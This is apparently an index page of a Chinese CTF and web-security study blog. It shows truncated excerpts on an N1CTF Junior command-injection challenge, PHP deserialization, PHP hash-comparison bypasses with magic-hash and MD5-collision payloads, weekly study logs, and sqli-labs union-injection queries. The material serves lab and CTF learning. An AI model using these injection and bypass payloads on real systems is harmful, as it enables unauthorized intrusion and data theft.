第二届N1CTF Junior-web
zako题目源码:
1234567891011121314<?php//something hide here$cmd = $_REQUEST["__secret.xswl.io"];if (strlen($cmd)>70) { die("no, >70");} die("你就不能绕一下喵");}system("./execute.sh '".$cmd."'");?>
execute.sh源码:
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061#!/bin/bashreject() { echo "${1}" exit 1}XXXCMD=$1awk -v ...
新周记3
周记3根据本次任务,继续完善一下知识点总结,链接如下:
一篇php反序列化,学习到了很多新trick以及其他的利用手段:https://Hades-blog.github.io/2024/01/22/%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93-web%E5%AE%89%E5%85%A8-php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/
以及一篇php特性总结,查缺补漏啊:https://Hades-blog.github.io/2024/02/01/%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93-web%E5%AE%89%E5%85%A8-PHP%E7%89%B9%E6%80%A7/
web安全-php反序列化及pop链
类与对象成员属性与成员方法访问限定符限定词Public 内部,外部,子类均可使用Protected 外部不能引用Private 仅内部可以使用类里面定义变量:var
序列化与反序列化1234567891011121314<?phpclass People{ public $id; protected $gender; private $age; public function __construct(){ $this->id = 'hades'; $this->gender = 'male'; $this->age = '18'; }}$a = new People();echo serialize($a);?>
结果:O:6:"People":3:{s:2:"id";s:14:"hades";s:9:" ...
web安全-PHP特性
md5 & sha1弱相等(==)绕过加密后形成0e开头的科学记数法,则值相等(都为0)
md5 payload:
12345QNKCDZO240610708s878926199as155964671as214587387a
sha1 payload:
123456aaroZmOkaaK1STfYaaO8zKZFaa3OFF9m0e129063370410932435112
强相等(===)绕过md5和sha1都无法处理数组,所以可以通过传入数组绕过
强类型绕过12(string)$_POST['a1']!==(string)$_POST['a2'] && md5($_POST['a1'])===md5($_POST['a2'])
可以构造两个MD5值相同的不同字符串
123456#1a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7 ...
新周记2
周记2这次根据任务加强一下对于Python的运用,简略并且快速的复习一下基本语法,并深入学习了一下正则以及爬虫之类的知识,发现有好多遗漏和没学习到的知识(看了学长发的正则教程真是受益匪浅),最后巩固一下计算机网络的知识框架
为了更好的运用,正好把之前就有的想法实践一番,自己写脚本做出sqli-labs中的几道盲注题和upload-labs的竞争上传题,并且好好的去看看SQLmap的工具源码
借此继续填坑知识点总结,总结一波sql注入,学习一下SQLmap工具,还学习到了二次注入和很多绕过技巧等,链接如下:
https://Hades-blog.github.io/2024/01/23/%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93-web%E5%AE%89%E5%85%A8-sql%E6%B3%A8%E5%85%A5/
此外,复盘了一下春秋杯冬季赛的web题,正好学习了一下打redis,链接如下:
https://Hades-blog.github.io/2023/08/25/CTF-2023%E6%98%A5%E7%A7%8B%E6%9D% ...
Sqli-labs
SQL注入靶场一些知识点详见周记4和6的SQL注入部分:
https://Hades-blog.github.io/2023/10/29/%E5%91%A8%E8%AE%B0-2023-10-29-%E5%91%A8%E8%AE%B04/https://Hades-blog.github.io/2023/11/12/%E5%91%A8%E8%AE%B0-2023-11-12-%E5%91%A8%E8%AE%B06/
Less-1字符型union注入
12345678910找到注入点闭合后查列数:?id=1' order by 3--+闭合后查库(security):-1' union select 1,database(),3--+查表:-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+查列:-1' union select 1,(select ...